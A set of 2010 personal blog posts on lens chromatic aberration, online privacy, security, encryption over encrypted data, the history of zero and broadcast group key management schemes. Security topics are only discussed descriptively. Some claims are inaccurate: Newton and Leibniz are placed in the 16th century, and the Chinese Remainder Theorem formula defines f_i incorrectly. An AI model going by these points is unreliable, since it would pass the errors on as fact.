[Photography] Testing the chromatic aberration in Sigma 10-20mm F4.0-5.6

2010-06-19T02:13:00.008-04:00

In reviews, it is said that Sigma 10-20 F4.0-5.6 (UWA - Ultra Wide Angle lens) has a low chromatic aberration (CA) (which is a good thing for people like me as I mainly do landscape photography), but I noticed that the aberration varies by quite a margin with different F (DoF - Depth of Field) values.

First some background info:
Chromatic aberration is a kind of distortion where the lens fails to focus all component waves of the white light to a single focal point. The white light consists of component waves of color red, green, yellow, blue and violate (in their increasing order of frequencies). The refractive index of lens glass varies with the wavelength; shorter waves bends more than the longer ones. See the following diagram:

When this happens, the sensor averages them and the edges in the image becomes distorted. See the Wikipedia page for an example. I was told that this happens mainly from the light entering closer to the edge. So, in theory, if you have a smaller aperture (i.e. later DoF value), aberration should be small. A simple technique to correct this distortion is to have a concave lens right next to the convex lens so that the effect of irregular bending of wavelength is corrected by dispersing them. But with mm focal lengths, it seems that such a simple technique does not work - it's much more difficult to correct this effect with UWA lens as they support very small focal length.

Test setting:
I used a Canon EOS T1i body and took multiple pictures at the same focal length (10 mm) but varying the depth of field (F values at 4/4.5/5, 5.6, 8, 11, 22, 29) at the same light condition. Here are some sample photos.

Unprocessed JPEG image for focal length = 10 mm, F = 4.0:

Unprocessed JPEG image for focal length = 10 mm, F = 11.0:

Unprocessed JPEG image for focal length = 10 mm, F = 22.0:

Note that due to the crop factor (1.6 in EOS T1i), the actual focal length is close to 16 mm.

I was expecting the CA to monotonically decrease with increasing DoF value (think in the line that with larger F values, we have smaller aperture and light will pass through mostly middle of the lens). However it was not the case. Maybe the complex inter-leaved lenses have other effects. The CA visible to the naked eye decreased 4 (highest CA), 5.6 8, 11 (lowest CA) and 11 and 16 had similar quality. At 22, CA was quite high and image quality was less than that for at 4. I am not in a position to explain this bell-curve shape like behavior. Would be very much interested to know the technical details behind the scene.

I repeated the above experiment for focal lengths 12, 14 and 16 mm. I found a similar pattern. The visible CA decreased as the F value is increased closer to the current or little above the current focal length but beyond that visible CA increased with increased F values.

So, with Sigma 10-20mm F4.0-5.6 on a Canon EOS T1i camera, if you want to take landscape photos with minimal CA, set the F value closer to the current focal length.

What's your identity (and religion)? [not a security post]

2010-06-18T23:09:00.007-04:00

Yes, what is your identity? We immediately think of the country we were born (the nationality), the religion (or a sub division of it) we follow, the ethnicity, the cast to which we belong, our parents, our siblings, the native languages we speak, our skin color, our height, etc. don't we? But wait...if you come to think about it, we pretty much don't have control over any of the above attributes; we don't have control over who our parents are, where we are born and so on; YET we not only label ourselves using those attributes, but sometimes, go so far as to start an arms struggle based on the differences in these attributes. Look at the current news -- most of the conflicts are due to these attributes -- the attributes we did not earn ourselves, but GIVEN to us (different religions interpret how this inheritance works differently -- but the underlying core is the same -- there should be some source of energy which does everything in such an orderly manner -- some of which are beyond human imagination) It is also sad to see that we discriminate people based on these labels that they don't have control over; high cast or low cast, black or white, short or tall, and so on. Your nationality is not your identity, and so are the skin color, the religion (literally), mother tongue, etc.

So, what exactly is your identity? Identity is something that you build yourself with a good intention and over which you have control. And that serves the greater good. Most religions I know of teach us to build this identity. However, looking at the current affairs, the religious identity is gravely misunderstood. This religious label is not your identity. Your religion becomes your identity only when you are truly honest to yourself (for example, treat everyone with the same spoon irrespective of the uncontrollable attributes) and truly care to make the world a better place to everyone (for example, by sharing your knowledge, wealth, etc., by raising your voice in a peaceful manner for the oppressed, the weak, etc.). In short, don't be evil. I hope this post gave you some food for thought.

Twitter

2010-06-16T12:23:00.002-04:00

After a long wait, debuted in Twitter :) My twitter id is nabeel_yoosuf. Hoping to share interesting/useful links and events there.

Tracking patients remotely

2010-06-15T01:29:00.003-04:00

When we talk about GPS, we immediately think about going from point A to B. Technologies similar to GPS have been used to track patient remotely. The basic idea is that these devices, which are, most of the time, attached to the patient, report the location information to a central location and if the movement patterns deviate from the normal patterns, they detect an anomaly. That anomaly could be something good (for example, a patient who is recovering making some movement could be a positive sign, no movement at all could be a negative sign).

There have been commercial as well as research projects in this regard. For example,

Remotely monitory elderly location: here here
A research project to track the recovery from a surgery: here
A device to track dangerous psychiatric patients: here
And many more

Even though these devices/techniques are designed/deployed with good intension, one concern here is people who are being monitored have no control over their own data, i.e. their movement information. And they don't have control over who can view their data. Hence, it could lead to serious privacy breaches. I'd like to see a system where it gives more control to the target (to someone on behalf of the target) over their information.

Security :-)

2010-06-14T11:04:00.000-04:00

Hi & Lois (via Schneier on security)

Security by deterrence

2010-06-14T00:09:00.005-04:00

When no one can watch (or trace one to what they do), the possibility of doing something bad (steal, break in, erase/modify/add data, etc.) is quite high. I was thinking about security cameras in supermarkets and shops. Is it more effective to have those cameras well visible to everyone or have them hidden? In my opinion they should be installed in visible locations; if they are not visible, there will be more bad people attempting to do bad things; it's true that you can track them down going through the surveillance videos and prosecute them - but think about the cost you have to incur; it is far more economical to indicate some sort of a warning signal. This will reduce the number such incidents and, yes, you can take necessary actions against those few bad incidents where bad guys dare to ignore the warning. Thinking in this line, you actually don't need real cameras installed all the places - you can safely have a few fake ones installed along with the real ones - they will act as a deterrence factor. (If you cannot afford to have a video surveillance system, it is at least good to have some fake cameras installed.)

What about firewalls, ID (Intrusion Detection) systems? I think we can make a similar argument about them.

Another side note, have you ever come across a situation where you cannot keep the lunch packets or any other food items from your co-workers in an office or classmates in a school? One crude way to do that is to take a bite and keep it :-) it'll surely act as a deterrence. A good way to have it packaged as if it's not a lunch packet - most hungry people won't bother to open that. This sandwich bag seems to be a good idea as well (though won't work after others figure out your trick)

[Math] Transitivity of relationships

2010-06-03T18:52:00.003-04:00

Most of the relationships in the real world that we know are transitive. For example, if Bob is taller than Tom and Tom is taller than Alice, it naturally implies that Bob is taller than Alice. At the same time, there are many other relationships where the transitivity is not clear. Take for example, a triangular series among Sri Lanka, India and England. Let's say that India beat England and England beat Sri Lanka. Does that mean India will beat Sri Lanka (comprehensively)? Not necessarily - in fact, it has proven numerous times in the past that the transitive relationship does not hold (a tournament would be boring if it were the case). In other words, the relationship is probabilistic in nature.

Some more not necessarily transitive examples in the technology/science field:
(Social networks) Bob is a friend of Sam. Sam is a friend of Tom. It does not necessarily imply that "Bob is a friend of Tom".
(Trust relationships in security) Alice trusts Bob to keep a secret. Bob trusts Mary to keep a secret. It does not necessarily imply that "Alice trusts Mary to keep a secret" since Alice needs to trust on something else to make the transitivity working. That something is Bob's ability to judge Mary's trustworthiness to keep a secret.

I also find that some relationships can never be transitive. For example:
(Family relationships) Mary is mother of Alice; Alice is mother of Eve. It is incorrect to say "Mary is mother of Eve".

In computer science, we mostly deal with deterministic transitivity. Take for example, Lamport's clock; if an event A occurs before an event B and an event C occurs before the event A, we safely conclude that the event C occurs before the event B. And the transitivity always holds. But, what about probabilistic transitivity?

Facebook - new advertising model?

2010-04-20T13:36:00.004-04:00

Heard about the news that Facebook is going to launch a new advertising model where they target ads based on user's browsing history. [1,2,3] From what I understood, FB is not going to (and unable to track) your complete browsing history; rather, FB is going to build a browsing profile for you based on what you explicitly want to "like" by clicking a button placed on a web page you browse. I think they already get some amount of browsing history information whenever you click "f-share" button on a web page which sends the request to http://facebook.com/.

The question is whether this behavioral targeting is an invation/violation of privacy? IMO, it's NOT a violation of privacy as opposed to what the links above try to indicate. Privacy is more about the control YOU have and less about secrecy. Unless YOU explicitly decide to like or share (by clicking), FB will not be able to do any meaningful behavioral targeting. It's still under YOUR control.

Of course, it is a violation of privacy, if FB tries to show ads to someone based on YOUR browsing history which they tried to do with beacon system and failed miserably; YOU loose control over YOUR data in this case. I think FB is not going do something similar to that with the new behavioral targeting.

Waiting to see how their system actually works!

write once, remain forever

2010-04-15T10:23:00.002-04:00

Here's an example:

Have you ever sent out a “tweet” on the popular Twitter social media service? Congratulations: Your 140 characters or less will now be housed in the Library of Congress.

That’s right. Every public tweet, ever, since Twitter’s inception in March 2006, will be archived digitally at the Library of Congress. That’s a LOT of tweets, by the way: Twitter processes more than 50 million tweets every day, with the total numbering in the billions.

People mining ;-)

2010-03-29T15:21:00.006-04:00

~~data~~ people mining - could be used for good or bad purposes just like everything else in life.

www.pipl.com
www.reunion.com
www.classmates.com
www.facebook.com
www.twitter.com
www.linkedin.com
www.myspace.com
www.switchboard.com
www.jigsaw.com
www.google.com
www.bing.com
www.rootsweb.com
www.tributes.com
www.legacy.com

(source)

Securing systems dealing with sensitive information

2010-03-28T10:41:00.003-04:00

I went through the executive summary of the audit report of a popular clinical information system in Canada which assessed the security measures in place. The 10 recommendations the report make are quite useful when implementing any access controlled information system; they are not new, but rather well-known facts (need-to-know, defense-in-depth, leakage-prevention, auditing, etc) but in practice largely neglected.

SEO poisoning on the rise

2010-03-26T10:21:00.003-04:00

Source:

The people who push malware love to trap victims via search. Security companies refer to what they do as "SEO (Search Engine Optimization) poisoning." They identify popular search terms, figure out which ones are likely to bring them suitable targets, and then optimize pages so engines like Google and Bing display their results on the first page -- mixed in amongst the non-malicious pages you actually wanted to find.

So what search words are most likely to get you into trouble? Bearshare (46% malicious sites) and screensaver (42% malicious sites).

The blog post here gives an idea of what kinds of black hat SEO techniques are frequently employed by cyber criminals.

Search engine optimization (SEO) is a collection of techniques used to achieve higher search rankings for a given website. "Black hat SEO" is the method of using unethical SEO techniques in order to obtain a higher search ranking. These techniques include things like keyword stuffing, cloaking, and link farming, which are used to "game" the search engine algorithms.

Cyber criminals also exploits the current hot news (celebrity affairs, death, etc.) at any given time to have search results for malicious pages with high ranks as people are likely to search for such news.

It is a good idea to make your web sites xss safe. If you are a PHP developer, htmlspecialchars and htmlentities are two very useful functions in this regard.

If you are a user, think before you click!

Learning/thinking by analogies

2010-03-24T16:23:00.004-04:00

For people with a computer science background (but not limited to), working with/thinking in analogies is part of life. For example, take design patterns Adapter, Bridge, Observer, Factory, etc.; they are all analogies. Analogies help us understand/solve the problem at hand.

I found the following analogy appeared in an article in ACM Communications March 2010 issue interesting:

Alice owns a jewelry store. She has raw precious materials—gold, diamonds, silver, etc.—that she wants her workers to assemble into intricately designed rings and necklaces. But she distrusts her workers and assumes that they will steal her jewels if given the opportunity. In other words, she wants her workers to process the materials into finished pieces, without giving them access to the materials. What does she do?

Here is her plan. She uses a transparent impenetrable glovebox, secured by a lock for which only she has the key. She puts the raw precious materials inside the box, locks it, and gives it to a worker. Using the gloves, the worker assembles the ring or necklace inside the box. Since the box is impenetrable, the worker cannot get to the precious materials, and figures he might as well return the box to Alice, with the finished piece inside. Alice unlocks the box with her key and extracts the ring or necklace. In short, the worker processes the raw materials into a finished piece, without having true access to the materials.

Cryptographically speaking ;), this is what we try to achieve with computation over encrypted data! (Note: this analogy does NOT fully represent this goal as the authors themselves point out)

rebuff huff 'n puff

2010-03-22T20:02:00.004-04:00

Creative!
(decoded title: say no to smoking)

How will the healthcare bill affect medicine?

2010-03-22T11:00:00.003-04:00

(The traditional way of managing medical records)

From "10 things you need to know about the healthcare bill":

The bill includes incentives to use more electronic medical records, which should make healthcare more efficient and effective. It would set up pilot programs for medical malpractice tort reform. Community health clinics, which help serve people who often don't have access to other forms of care, would get more funding. Medicare payments would be linked to quality of care, which should shift more providers toward evidence-based standards to see how well treatments work.
Other pilot programs would be set up to study how to improve public health in general, and improve care for people with chronic diseases, rural patients and other groups. The goal is to improve the quality of care while holding the costs down.

spring..

2010-03-19T18:56:00.006-04:00

When the snow vanishes from the ground
And no cold breeze is to be found
The feeling of thankfulness is profound
As I know that the spring is around
The corner with fresh hope
And I feel like nothing is out of my scope
Trees will slowly and surely start to blossom
Reminding me how awesome
It is to be alive
And a convertible can I drive :)
~Nabeel

To friend or not to

2010-03-17T20:15:00.003-04:00

I don't mean to be paranoid here, but you better think twice before you become friend with someone in a social network.

It may be an undercover agent that you are accepting as a friend; this could lead to privacy violations if you are an innocent party.

Law enforcement agents are following the rest of the Internet world into popular social-networking services, even going undercover with false online profiles to communicate with suspects and gather private information, according to an internal Justice Department document that surfaced in a lawsuit.

Want to know how they do it and what they can obtain? read up here.
I don't mind if they use social networks to uncover only those who did something wrong or really questionable, but it would be naive for me to think so.

Facebook's rules, for example, specify that users "will not provide any false personal information on Facebook, or create an account for anyone other than yourself without permission." Twitter's rules prohibit users from sending deceptive or false information. MySpace requires that information for accounts be "truthful and accurate."

I am confused now; can I prosecute an undercover agent on the above ground?

It may be someone impersonating someone else for totally different reason:

Around September 20, 2006, Lori Drew created the Myspace account for the "Josh Evans" alias. At the time Drew operated the Josh Evans MySpace account, she was aware that Meier had been taking antidepressant medication. Meier committed suicide as a result of the bullying.

It may be someone who tries to defame you by associating you with something that you are not. For example, tagging you in an image that is not socially acceptable or writing defamatory/incorrect remarks about you on your wall.

How do you know if a person is who he/she claims to be in a social network? Well, there's no formula for that. But it is in general a good idea to check the mutual friends a person has before accepting the request. It may not work in some cases. What if some of your friends have already been fooled to be friends with that person? (which I have encountered at least a few times already)

How privacy vanishes online and some thoughts

2010-03-17T16:57:00.005-04:00

Very timely article:
"If a stranger came up to you, would you say your email address, your phone number?
If you have a not so close friend would you tell your DoB to him/her?
Probably not..yet people say it on the Internet."

“Personal privacy is no longer an individual thing: In today’s online world, what your mother told you is true, only more so: people really can judge you by your friends.”

As the article also briefly mentions, you may think that innocuous attributes such as where you work, your current location, where and what you studied, etc. will not lead to identify you as a unique individual. However, there is research indicating that the aggregation of these small small things can lead to something powerful even to the extent to identify your social security number. Actually, one of my research goals is to minimize the revelation of use innocuous credentials used as part of access controlling in service consumption scenarios. In other words, the question is "how do I get the service with no or minimal disclosure of credentials yet convincing the service provider?"

Another question I am in search of answers is "how much privacy do I loose by revealing different bits of information in different places in the Internet?". Intuitively, as you reveal more attributes about you, you become easier to identify. How does this relationship vary - is your identifiability proportional to something about your attributes? Some attributes reveal more than others. My next question is about identifying that "something"; "Can we capture this notion in an information theoretic way?"

Computation over encrypted data [Crypto]

2010-03-17T11:59:00.007-04:00

The following diagram shows the ideal situation:
The objective is to perform a general computation over encrypted data so that the party that performs the computation learns neither the input values nor the result of the computation (over a finite field). The computation to be performed (e.g. eigenvalue computation, null space computation, Gaussian elimination, etc.) is public (i.e. known to everyone). Theoretically speaking, one can achieve the above objective using a SMC (Secure Multiparty Computation) protocols by evaluating a scrambled Boolean circuit. However, it is not practical.

Two popular practical techniques that we can use:
1. Commutative encryption (Pohlig-Hellman)
2. Homomorphic encryption (Paillier, Damgard, Unpadded RSA, Benaloh, ElGamal, etc.)

Since I am interested in one off computation, IMO, homomorphic encryption is the most suitable here. Computations over finite fields, in general, involves two binary operations (e.g. addition and multiplication). However, all the practical homomorphic crypto systems are homomorphic to only one operation. (E.g.: addition - Paillier, Damgard, Benaloh; multiplication - Unpadded RSA, Elgamal). It should be noted that mid last year, IBM published a paper on a fully homomorphic encryption using ideal lattices, but it is computationally intensive and thus not suitable for real applications. So, it is still an open problem to invent a practical fully homomorphic encryption. Until such an invention, we need to rely on specialized protocols to solve the afore mentioned problem.

Sir Ken Robinson: Do schools/universities kill creativity?

2010-03-17T10:35:00.003-04:00

Very valid points!

The points that made me think most were the facts that our education system stigmatizes mistakes and schools/universities are like factories that produce people to work in the industry.

Why DRM doesn't work ;)

2010-03-15T10:12:00.001-04:00

here and here ;)

TBL on linked data

2010-03-08T16:03:00.004-05:00

The talk is about one year old, but still interesting and current. This year's ICDE conference also had some interesting papers on topics related one way or the other to linked data.

Slides of my talk at ICDE 2010

2010-03-08T16:01:00.003-05:00

Last week, we had the ICDE 2010 conference in Long Beach, LA. Here are the slides of my talk.

Another great presentation

2010-02-24T10:17:00.003-05:00

"Cloud computing - why it matters?" by Simon Wardley (OSCON '09). I like the presentation style and the presentation itself.

Identity 2.0 keynote

2010-02-20T10:38:00.003-05:00

The following keynote (found thanks to a friend of mine) is quite old, but I thought of adding it here as the presentation style used is quite interesting (the content is very useful as well). I liked it so much that I watched it twice. I think I am going copy some of his style in my presentations.

Health care identity theft

2010-02-15T12:42:00.003-05:00

A good news article on health care identity fraud and its current status.

Theft of health care identity is relatively new; partly because it's only now people are starting to use electronic health care records. Last year, in the stimulus package, the US government allocated billions of dollars to start build a nation wide online health care record system over the next couple of years. So, I think there will be more such incidents than what we currently see.

Some stats:
...It is estimated that the number of identity fraud victims in the United States increased by 12 percent, to 11.1 million adults in 2009, while the total annual fraud amount increased by 12.5 percent, to $54 billion.

"Health insurance-related identity fraud is particularly troublesome because of the relative costs. The average identity fraud victim pays $373, while a health insurance fraud victim pays $2,228, and a health insurance fraud typically is about $12,100 in total, compared with $4,841 for an average identity fraud case."

A simple solution to minimize such frauds is to ask for multiple credentials (driver's license, student photo ID, etc.) along with the health insurance card; it is unlikely an impersonator possesses all these.

This is good news for those who do research in protecting medical records - there is a real need.

Some creative Flickr photos marking the day..

2010-02-14T01:39:00.005-05:00

(Source: link)

(Source: link)

(Source: link)

The Good, the Bad and the Ugly at the same time..

2010-02-12T10:07:00.004-05:00

It is sad to see that if you criticize or are open minded about the current ruling, they think you are a conspirator..and if you speak for the people in the north and east, they think you are a traitor. I agree with most of the things that Shahani mentions in her blog .. whatever happens politically, still Sri Lanka is one of the best (my public photos bear witness :-)

Google buzz is criticized for privacy concerns

2010-02-11T12:14:00.008-05:00

After setting up buzz, if you don't change the default settings, others can see who you most frequently (not sure about the most frequent part, I guess they pick almost all the contacts that you ever had conversation with if your contact list is not too long) chat with or email to due to the default automatic friends feature. Looks like they have not learned from the Facebook beacon experience -- when it comes to information sharing it is safer to opt-in rather than opt-out.

The above link mentions that:
"Imagine ... a wife discovering that her husband emails and chats with an old girlfriend,"

(Btw, if you are honest, you probably don't need to hide anything. Are we encouraging people to be dishonest by allowing them to hide behind the screen in the name of privacy??)

Also mentions that:
"Imagine ... a boss discovers a subordinate emails with executives at a competitor."

(When you use a free service like Google mail/chat, you don't have much control over your information - your profile, your chat logs, your contacts, your emails ... this raises the question if we should use such services for business purposes or highly private matters??)

There could be other damaging inferences as well. For example, if Bob frequently communicate with one of his doctors, John, who specializes in cancer treatment. Others will be able to infer that Bob is possibly having some sort of cancer.

Mitigating factors:
There are some mitigating factors, however. Buzz only shares information about other people who are using Buzz and have set up public profiles in Google. So currently, most Gmail users are not publicly listed by the service. Users can also "unfollow" people who they don't want to be linked to.

You can follow the steps in this to change the default settings.

Alice, Bob, Malloy, Jared, Tim and Eve

2010-02-06T11:50:00.004-05:00

Yesterday I was at a short talk on watermarking. Thought of checking out some recent work on the subject. And I was think how I am going to explain it to someone who is not interested in technical stuff. Following description is adapted from a relatively old paper with the usual security characters:

Data hiding aims at enabling Alice and Bob to exchange messages in a manner as resilient and stealthy as possible, through a medium controlled by evil Mallory. Alice and Bob don't care if Mallory see the hidden message.

On the other hand, digital watermarking is deployed by Alice to prove ownership over a piece of data (a music album, movie, photo, document, etc), to Jared the Judge, usually in the case when Tim the Thief benefits from using/selling that very same piece of data (or maliciously modified versions of it). In order to convince Jared, the piece of data should have something unique that only Alice can show its existence (Ideally, Alice should be able to challenge Tim to show how to get that unique thing from the data; Tim fails to do so since he does not possess a secret that only Alice knows. This will impress Jared more about Alice's claim and Jared is most like to send Tim to jail.). Jared does not care what that unique thing is - it just needs to be unique. To be effective, Tim should be able to remove that unique thing from the piece of data (better if Alice can prove if Tim tried to tamper the piece data). For a usability point of view, that unique unique thing that Alice has attached to the piece of data should not affect the quality or any other desirable property of that piece of data.

Now in another scenario, Alice wants to send a message to Bob through a communication channel controlled by Eve and she want to hide the existence of that message from Eve (not even want to show the cryptic message which Eve cannot decipher anyway). So, Alice uses stenographic techniques here. Unlike watermarking, here the hidden message is the main data. Alice takes some public piece of data (e.g. an image) and embeds the message. For Eve, it looks all normal. Alice and Bob shares a secret so that once Bob gets the public piece of data, he can extract the hidden message. It would be even better if Eve cannot know if a communication took place between Alice and Bob. In certain situation (like in a war) knowing that two parties communicated with one another could be valuable information.

Imagination is the limit

2010-02-04T08:09:00.002-05:00

Ref: link

Funny..

2010-02-02T22:41:00.003-05:00

You probably have watched this video earlier. I happened to watch it again. It's so funny :) .. there's a message as well - I don't like people bragging about their personal life in Twitter/Facebook or any other social media, but Twitter could be a useful tool if it is used in the right way.

This one is not only funny, but also very creative :) .. there is some reality as well.

Minority aspirations and the failed democracy..

2010-01-31T14:45:00.010-05:00

I usually don't write about politics. But I couldn't help writing about this one.

The following figure shows the vote distribution of the recently concluded presidential election.

(Source: http://www.srilankanelections.com/)

For me, the green districts (in north and east) do not mean that MR lost or SF won (barring some green spots in the hill country, Colombo and some more urban areas); but rather they mean that minority aspirations are not met by the government ruled by the majority. Look who are living in these areas; either minority Tamils or Tamil-speaking Muslims. If we look at the world history, it is a usual thing that the majority is not sensitive to minority issues. The real challenge is whether MR can reverse this and be sensitive to minority issues. I think it'll take lot more to heal the ethnic division than winning the war. That's when I will say Sri Lanka has real peace. I hope that day is not far away.

Update [2/2/2010]: First of all, I am neither supporting nor in favor of any political party or any political leader in Sri Lanka. From the point of view of democracy, MR should not be allowed to extend his next term more than what is stipulated; it is he who called for an early election (which should not have been done in the first place; if he's truthful, not power hungry and had no hidden agenda, why an early election??) and there should be consequences for it. But to my disappointment, he's allowed to extend his tenure by almost one year. I don't know much about politics, but I know that when a country does not have a strong opposition (like the current situation), it is unfortunate that, at the end of the day, it's the civilians who have bear the consequences.

Update [2/8/2010]: It is disturbing to hear that SF has been arrested. As I mentioned before I am not a supporter of SF, but where is democracy?? Would he be arrested under war crimes, had he not stood against MR?? (A few days before, some army officials were also fired under the same ground.)

First they came for the communists, and I did not speak out—because I was not a communist;
Then they came for the trade unionists, and I did not speak out—because I was not a trade unionist;
Then they came for the Jews, and I did not speak out—because I was not a Jew;
Then they came for me—and there was no one left to speak out for me.
~ Martin Niemoller

Substitute the above with brave journalists, impartial news papers and other media, people who questions the current ruling party, etc... is the history repeating??

How unique/trackable is your browser?

2010-01-30T22:51:00.004-05:00

I've just got a "fingerprint" of my browser through the Panopticlick tool. The result is as follows:

Your browser fingerprint appears to be unique among the 389,007 tested so far.

Currently, we estimate that your browser has a fingerprint that conveys at least 18.57 bits of identifying information.

This is a worrying fact; browser fingerprint is a very effective way of tracking users in the Internet. Why should you take defensive measures against such tracing down? This clearly invades your privacy. You probably don't want someone to profile your online trace without your consent or knowledge. If your browser sends out too much unnecessary information (increasing the likelihood of uniqueness), multiple visits to not only the same site but also different sites can be linked. So, with these fingerprints, systems providing anonymous access to digital content, digital cash become ineffective since these methods make an implicit assumption that the attacker does not use the background information available through the communication channel itself.

It should be noted the same browser fingerprinting technique is used to provide protective measures as well. For example, my bank won't ask for additional credentials when I log through the browser I use everyday, but when I log in from a new browser/new location/new computer, they will ask for additional credentials. The challenge is to protect user privacy without compromising security.

Another challenge is to protect user privacy without limiting the usability. For example, one technique to minimize the risk of fingerprinting is to disable java scripts, but most sites require java scripts to work.

Update [2/2/2010]: The above work allows to identify browsers, but not exact users. Researchers from the Isec lab have devised a method to identify users using social network group membership as background knowledge. It's a two step process:
1. Generate a group membership fingerprint for each users (their thesis is that the collection of groups a user is member of is more or less unique).
2. User history stealing technique to identify the links the user previously visited. Their TR is available here (A practical attack to de-anonymize social network users).

ZERO: How was it discovered?

2010-01-29T11:10:00.014-05:00

The history behind the concept of zero is an interesting one. We are so used to the number zero that we cannot live without it (what if a zero is dropped from your salary and appended to your electricity bill ;).

On a serious note, in the early history of counting, the number zero neither required nor well understood; and the same with the negative numbers. why? early mathematics was based on counting real things as opposed to abstract ideas. It is fascinating to see that things, like the concept of zero, we take for granted took centuries and many great minds to discover. The following time line of historical events is an indication of this fact. I hope this will be a good reminder to all of us that we will never achieve perfection and we progress through our mistakes/needs. No mistakes/needs, no progress!

3000 BC [3] : Sumerian numerical system - Separated numbers from goods, but no concept zero (zero loaves of breads, zero cows, etc. did not make much sense at that time :D). Some details of their progress:
Version 1: Different types of goods were represented by different symbols, and multiple quantities represented by repetition.
Examples: two units of grains was represented by two grain-marks. Four oil cans was as four oil-can-marks.
Version 2: Separated the quantity of the good from the symbol for the good. That way a great amount of redundancy was prevented. They introduced a sexagesimal system (that is, base 60). Not sure why it's base 60 instead of any other base.
Example: two units of grains as the symbol followed by the symbol of grain.

(Sumerian system)

Around 3000 BC - Egyptians introduced the earliest fully developed base 10 numeration system. It's not a positional number system as the decimal number system we have, but it can represent large numbers. (For example, to represent 45, they used 4 number 10 symbols and 5 number 1 symbols) Similar to Roman numerals.

(Egyptian hieroglyphics)

Egyptians also did not have the concept of zero since they also mainly thought numbers as concrete concepts for measurement of length, trading, etc. Still, I am amazed about Egyptian math; even without the concept of zero, they were able to build precisely calculated colossal pyramids and other structures. Also, through their math skill, they were one of the ancient nations who got close to calculating the correct number of days per year.

2700-2300 BC Sumerian/Akkadians invented the Abacus. They use it with their sexagesimal number system.

Babylonian number system [2]: First to introduce the place value system (just like the decimal number system we have) but still no concept of zero.
Sumerian number system still needed many symbols to represent numbers. Influenced by this number system, Babylonians, towards the end of the 3rd millennium, introduced the place value system. They just needed two symbols to count.

(Babylonian system)

700 - 400 BC - Use of zero to denote an empty position in the notational system.
Babylonians put two wedge symbols to where we would put zero in the decimal notation. These empty wedge symbols only occurred within a number (as in 5403 in decimal); never place at the ends (as in 5430 in decimal); zero was never used as a number, but rather as a punctuation sign.

During this time Greek mathematicians did not use a positional number system. They developed their theories/abstract concepts through shapes/geometry. It was during this period great mathematicians like Euclid lived. Even without the concept of zero, people like Euclid worked on number theory (which lead to the fundamental theorem of arithmetic, Euclidean algorithm, etc), but it was based on geometry. However, Greek astronomers used the notation of zero and it is believed to be similar to how we currently use zero. But they did not appear to have devised a number system based on zero.

(Euclid)

5th century - Indians (mainly Aryabhata) were the first develop a base 10 positional numeral system (remember Babylonians invented base 60 positional numeral system a long time before that) which resembles closely to our current decimal system. These dates are still disputed, but I think it's fair to credit Indians for the number system we currently have.

(Aryabhata)

People started to think about numbers as an abstract concept. As a result, the number zero as we use today was born.

7th century (dates are disputed) - The first appearance of zero as number by Indians. (There is some dispute about the origin as well - there appear to have some Chinese connection as well, but not sure about it)

876 AD - The first record of the Indian use of zero which is dated and agreed by all to be genuine.

Indians formulated arithmetic rules involving zero and negative numbers although they did not get it right in the first few attempts. Brahmagupta, in his book "Brahmasphutasiddhanta", got most of the arithmetic operations right except the division by zero: "0/0 is 0 and a number divided by zero is that number". For many centuries after this, division by zero remained a mistry to peope; they simply did not know how to explain it. During the same time, Islamic/Arabic mathematicians, especially, Al-Khawarizmi, studied Indian number system and contributed to the arithmetics with numbers. The combined work led to the Hindu-Arabic numberal system we are using today. In 12th centure, this system was spreaded to Europe mainly through the Italian mathematician, Fibonacci. There is no doubt that the development of zero is a very important milestone in human civilization and it paved way to many new concepts.

(There is evidence that in the 6th century, Mayans used a base 20 number system with a number zero. Also, they appear to have used the number zero a long before that. However, their knowledge has not influenced others.)

There have been many developments and rules about division by zero in the history, but let's not go into that. Currently we consider division by zero is undefined in any system that obeys the axioms of a field (e.g. real numbers, complex numbers, etc.).

In the 16th century, Newton and Leibniz, fathers of calculus, played a key role in understanding "division by zero" and its applicability to real life. Instead of considering absolute values, working with numbers approaching zero, they were able to develop a new branch of Mathematics, calculus. I think this is another very important milestone on the number zero.

At present, we cannot imagine Math, Physics, Chemistry or any other branch of scinece without having the value zero, yet it took many centuries to develop the idea of having a zero in the number system and people had been working with numbers well before zero came into picture. Empty sets (cardinality zero sets), zero gravity, freezing point, zero probability, accounting, modular arithmetics, calculus, Cartesian coordinate system, indexing are just name a few references.

We would not have progressed this far, had the concept of zero not understood.

References:
[1] http://yaleglobal.yale.edu/about/zero.jsp
[2] http://www-groups.dcs.st-and.ac.uk/~history/HistTopics/Zero.html
[3] http://it.stlawu.edu/~dmelvill/mesomath/sumerian.html

The 3rd data privacy day (Jan 28th)

2010-01-28T23:12:00.002-05:00

Today is the data privacy day.

Interesting broadcast group key management schemes

2010-01-21T15:58:00.012-05:00

In this post, I focus on some really neat broadcast group key management schemes/protocols (BGKM). The idea behind the schemes are based on quite simple algebraic constructs, but they are very elegant.

In addition to other properties, a good GKM scheme should provide the following two properties.
1. Forward secrecy - a user who left the group should not be able to access new keys
2. Backward secrecy - a user who joined the group should not able to access old keys

In my opinion, these are two most difficult properties to satisfy in a group communication setting. In order to satisfy these two properties, it is required to initiate a rekeying operation (i.e. change the existing keys). There have been many GKM schemes proposing various way of doing rekey operation. What set them apart is the communication cost of the rekeying operation. Earlier GKM schemes had O(n) communication overhead, where n is the number of users in the group. Later, it was improved to incorporate a hierarchy and the communication overhead was reduced to O(log n). Further, these rekeying operations are not transparent to users; every time a user joins/leaves, other users need to update their keys. Can we make the communication overhead to be O(1) (i.e. independent of the number of users in the group? This is where the BGKM schemes fit.

BGKM schemes make the rekeying operation transparent to existing users at the expense of additional computational cost at the server which manages the BGKM scheme. There are three noteworthy BGKM schemes which I will go over in some details giving the key ideas in the rest of this post.

1. The secure lock (SL) approach based on the Chinese Remainder Theorem (CRT) [SE 1989]
2. The access control polynomial (ACP) approach based on special polynomials [INFOCOM 2008]
3. The access control vector (ACV) approach based on matrix null spaces [ICDE 2010]

1. The Secure Lock (SL) approach
(Slightly modified the original version)
Each user u_i is given a random secret value s_i and a unique secret number n_i at the time of joining. These n_i's are relatively prime in pairs. The server construct the following congruences and compute the common solution using the CRT and broadcast to the group whenever there is a leave or join.

x ~ r_1 (mod n_1)
x ~ r_2 (mod n_2)
...
x ~ r_n (mod n_n)

where ~ is the congruence symbol, r_i = K XOR s_i, K is the actual key. (r_i < n_i)

Then construct the common solution, using the CRT:
x ~ \sigma{i=1}{n} N/n_i * r_i * f_i (mod N)

where N = n_1 * n_2 * ... * n_n,
f_i ~ N/n_i (mod n_i).

Let the standard representative of the common solution is C.

A user u_r with the secret s_r and the public value n_r derives the key by (C mod n_r) XOR s_r. (Note that C mod n_r gives the value r_r)

